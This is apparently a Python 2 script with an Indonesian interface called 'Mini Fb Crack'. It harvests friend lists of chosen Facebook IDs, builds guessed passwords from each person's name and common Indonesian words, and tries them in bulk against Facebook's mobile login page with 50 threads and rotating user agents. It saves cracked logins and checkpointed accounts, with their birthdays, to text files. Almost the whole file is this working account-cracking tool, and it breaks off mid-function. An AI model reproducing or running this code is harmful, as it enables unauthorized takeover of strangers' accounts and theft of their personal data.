#-*-coding:utf-8-*-
m = '\033[1;91m'
p = '\033[1;97m'
h = '\033[1;92m'
b = '\033[1;96m'
u = '\033[1;94m'
k = '\033[1;93m'
loop = 0
ok = []
cp = []
id = []
pwx = []
host="https://m.facebook.com"
try:
	import os
	import re
	import sys
	import time
	import json
	import random
	import requests
	import importlib
	import subprocess
	from urlparse import urlparse as quote
	from multiprocessing.pool import ThreadPool
	from requests.exceptions import ConnectionError
	from datetime import datetime
except Exception as drong:
	exit(" \033[0;97m[\033[0;91m!\033[0;97m] %s Belum Di Install"%(drong))
s = requests.Session()
ko = random.choice([' Telkontol > ',' Pilih > ',' Input > '])
co = random.choice([' Telkontol > ',' Pilih > ',' Input > '])
kocok = random.choice([' Telkontol > ',' Pilih > ',' Input > '])
nginput = random.choice([ko,co,kocok])
def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.01)
def cek_tokenmu():
	try:
		token = open("token.txt", "r").read()
	except IOError:
		login()
	else:
		try:
			cek = requests.get("https://graph.facebook.com/me?access_token={}".format(token)).json()["name"]
			print (p+' [√] Selamat Datang '+k+cek);time.sleep(2)
		except KeyError:
			print (m+' [!] Tokenmu Mati');time.sleep(1)
			os.system('rm -rf token.txt')
			login()
		except requests.exceptions.ConnectionError:
			exit(raknosinyal)
def banner():
	os.system('clear')
	print ('''
\033[1;94m   ╔╦╗╔╗ ╔═╗  ╔═╗╦╔╦╗╔═╗╦  ╔═╗
\033[1;97m   ║║║╠╩╗║    ╚═╗║║║║╠═╝║  ║╣ 
\033[1;96m   ╩ ╩╚═╝╚═╝  ╚═╝╩╩ ╩╩  ╩═╝╚═╝
\033[1;92m   Mini Fb Crack Simpel Crack!
\033[1;93m ''')
had = ''' [1] Crack Dari ID Teman/Publik
 [0] Exit/Logout/Keluar !
 -------------------------------'''
def crack():
	banner()
	global token
	try:
		token = open('login.txt', 'r').read()
	except IOError:
		print(' \033[0;97m[\033[0;91m!\033[0;97m] Token Invalid')
		tokenz()
	print ('\033[1;93m -------------------------------\n\033[1;97m  [\033[1;92m#\033[1;97m] Target Min \033[1;97m1 \033[1;97mMaks \033[1;92m10')
	limt = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Berapa Target : ')
	if limt =='':
		print (' \033[1;97m[\033[1;91m!\033[1;97m] Wajib Diisi !')
		crack()
	elif limt == '1':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public : ")
		try:
			lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Berapa Target : ')
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			#,avsid = open("dump1.txt", "a")
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
				#avsid.write(ngentod+'[-]'+tante+'\n')
			#avsid.close()
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID Tidak Ada !')
			exit()
	elif limt == '2':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
	elif limt == '3':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
	elif limt == '4':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
	elif limt == '5':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
	elif limt == '6':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
	elif limt == '7':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		idt7 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 7 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt7+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 7 Tidak Ada !')
	elif limt == '8':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		idt7 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 7 : ")
		idt8 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 8 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt7+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 7 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt8+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 8 Tidak Ada !')
	elif limt == '9':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		idt7 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 7 : ")
		idt8 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 8 : ")
		idt9 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 9 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt7+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 7 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt8+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 8 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt9+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 9 Tidak Ada !')
	elif limt == '10':
		idt1 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 1 : ")
		idt2 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 2 : ")
		idt3 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 3 : ")
		idt4 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 4 : ")
		idt5 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 5 : ")
		idt6 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 6 : ")
		idt7 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 7 : ")
		idt8 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 8 : ")
		idt9 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 9 : ")
		idt10 = raw_input(" \033[0;97m[\033[0;91m+\033[0;97m] ID Public 10 : ")
		lim = raw_input(' \033[0;97m[\033[0;91m+\033[0;97m] Limit Per Target : ')
		try:
			r = requests.get("https://graph.facebook.com/"+idt1+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 1 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt2+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 2 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt3+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 3 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt4+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 4 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt5+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 5 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt6+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 6 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt7+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 7 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt8+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 8 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt9+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 9 Tidak Ada !')
		try:
			r = requests.get("https://graph.facebook.com/"+idt10+"/friends?limit="+lim+"&access_token="+token)
			j = json.loads(r.text)
			for a in j['data']:
				ngentod = a['id']
				tante = a['name']
				id.append(ngentod+'[-]'+tante)
		except KeyError:
			print (' \033[1;97m[\033[1;91m!\033[1;97m] ID 10 Tidak Ada !')
				
				
				
				
	print(" \033[0;97m[\033[0;93m*\033[0;97m] Total ID  : \033[0;91m"+str(len(id)))
	ask = raw_input("\n \033[0;97m[*] manual pass?? Y/t /a : ")
	if ask == "Y" or ask == "y":
		manual()
	if ask == "a" or ask == "A":
		manuapi()
	
	def main(user):
		global loop, token
		pwx = []
		sys.stdout.write(
		      '\r \033[0;97m[*\033[0;97m] Cracking %s/%s OK-:%s - CP-:%s ' % (loop, len(id), len(ok), len(cp))
		); sys.stdout.flush()
		try:os.mkdir("results")
		except OSError:pass
		uid,name=user.split("[-]")
		for ss in name.split(" "):
			if len(ss)<3:
				continue
			else:
				if len(ss) == 1 and len(ss) == 2 and len(ss) == 3 and len(ss) == 4 or len(ss) == 5:
					pwx.append(ss+"123")
					pwx.append(ss+"12345")
				else:
					pwx.append(ss+"123")
					pwx.append(ss+"1234")
					pwx.append(ss+"12345")
					pwx.append("12345")
					pwx.append(ss)
					pwx.append("bismillah")
					pwx.append("rahasia")
					pwx.append("alhamdulillah")
					pwx.append("cintaku")
					pwx.append("sayangku")
					pwx.append("katasandi")
					pwx.append("sayang")
		try:
			for pw in pwx:
				pw = pw.lower()
				ua = random.choice(['Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 [FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]','Mozilla/5.0 (Linux; Android 7.0; Redmi Note 4X Build/MiUI MS; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/65.0.3325.109 Mobile Safari/537.36'])
				rex = requests.post('https://mbasic.facebook.com/login.php', data={'email': uid, 'pass': pw, 'login': 'submit'}, headers={'user-agent': ua})
				xo = rex.content
				if 'mbasic_logout_button' in xo or 'save-device' in xo:
					print('\r  \033[0;92m* --> ' +uid+ '|' + pw + '       ')
					ok.append(uid+'|'+pw)
					save = open('ok.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(pw)+'\n')
					save.close()
					break
					continue
				if 'checkpoint' in xo:
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						ttl = data['birthday'].replace("/","-")
						nama = data['name']
						print('\r  \033[0;93m* --> ' +uid+ '|' + pw + '|' + ttl)
						cp.append(uid+'|'+pw+'|'+ttl)
						save = open('cp.txt','a') 
						save.write('  * --> '+str(uid)+'|'+str(pw)+'|'+ttl+'\n')
						save.close()
						break
					except(KeyError, IOError):
						ttl = " "
					except:pass
					print('\r  \033[0;93m* --> ' +uid+ '|' + pw + '       ')
					cp.append(uid+'|'+pw)
					save = open('cp.txt','a') 
					save.write('  * --> '+str(uid)+'|'+str(pw)+'\n')
					save.close()
					break
					continue
					
			loop += 1
		except:
			pass
	p = ThreadPool(50)
	p.map(main, id)
	exit("\n \033[0;97m[\033[0;96m#\033[0;97m] Finished")

def manual():
	pw = raw_input(" \033[0;97m[\033[0;92m*\033[0;97m] Set Password : ")
